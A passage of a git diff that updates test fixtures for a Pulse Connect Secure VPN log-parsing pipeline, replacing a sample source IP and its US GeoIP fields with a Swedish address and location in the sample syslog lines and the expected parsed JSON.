}, "message": "User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured", "tags": [ 
@@ -289,26 +298,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:09.222394295Z", - "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured", + "ingested": "2021-12-14T14:54:26.631298306Z", + "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:11:19.000+02:00", 
@@ -328,22 +340,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.", "tags": [ 
@@ -365,26 +380,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:09.222397227Z", - "original": "Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.", + "ingested": "2021-12-14T14:54:26.631298671Z", + "original": "Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:16:34.000+02:00", diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log index e0d26a99051..af18bb30ef8 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log 
+++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log 
@@ -1,12 +1,12 @@
-Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 55.53.160.32
-Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.
-Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop
-Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.
-Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM
-Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed.
Reason: Wrong Password
-Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 55.53.160.32
-Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed
-Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)
-Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209
-Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [55.53.160.32] user.name()[] - Logout from 55.53.160.32 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)
-Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).
\ No newline at end of file
+Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 89.160.20.156
+Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.
+Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop
+Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.
+Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM
+Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed.
Reason: Wrong Password
+Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 89.160.20.156
+Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed
+Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)
+Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209
+Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [89.160.20.156] user.name()[] - Logout from 89.160.20.156 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)
+Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).
\ No newline at end of file
diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json
index 505a9a7bd3b..2cdb6ed4baa 100644
--- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json @@ -7,24 +7,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Primary authentication successful for user.name/REALM from 55.53.160.32", + "message": "Primary authentication successful for user.name/REALM from 89.160.20.156", "tags": [ "preserve_original_event" ], 
@@ -44,26 +47,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677697843Z", - "original": "Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 55.53.160.32", + "ingested": "2021-12-14T14:54:27.270276152Z", + "original": "Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 89.160.20.156", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:16:53.000+02:00", 
@@ -83,24 +89,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "tags": [ "preserve_original_event" ], 
@@ -120,26 +129,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677703627Z", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "ingested": "2021-12-14T14:54:27.270279231Z", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "timezone": "+02:00", "created": "2021-10-19T09:10:35.000+02:00", "kind": "event", 
@@ -175,22 +187,25 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop", "tags": [ 
@@ -219,26 +234,29 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677706748Z", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop", + "ingested": "2021-12-14T14:54:27.270279691Z", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop", "timezone": "+02:00", "created": "2021-10-19T09:10:35.000+02:00", "kind": "event", 
@@ -260,22 +278,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.", "tags": [ 
@@ -297,26 +318,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677709805Z", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.", + "ingested": "2021-12-14T14:54:27.270280070Z", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:10:35.000+02:00", 
@@ -333,22 +357,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for user.name/REALM", "tags": [ 
@@ -370,26 +397,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677712797Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM", + "ingested": "2021-12-14T14:54:27.270280505Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", 
@@ -406,22 +436,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed. Reason: Wrong Password", "tags": [ 
@@ -443,27 +476,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Wrong Password", - "ingested": "2021-12-08T13:53:10.677715713Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed. Reason: Wrong Password", + "ingested": "2021-12-14T14:54:27.270280882Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed. Reason: Wrong Password", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", "kind": "event", 
@@ -481,24 +517,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Primary authentication failed for user.name/sign-in-page from 55.53.160.32", + "message": "Primary authentication failed for user.name/sign-in-page from 89.160.20.156", "tags": [ "preserve_original_event" ], 
@@ -518,26 +557,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677718691Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 55.53.160.32", + "ingested": "2021-12-14T14:54:27.270281263Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 89.160.20.156", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", 
@@ -554,22 +596,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed using auth server AuthServer (Local Authentication). Reason: Failed", "tags": [ 
@@ -591,27 +636,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Failed", - "ingested": "2021-12-08T13:53:10.677721608Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed", + "ingested": "2021-12-14T14:54:27.270281651Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", "kind": "event", 
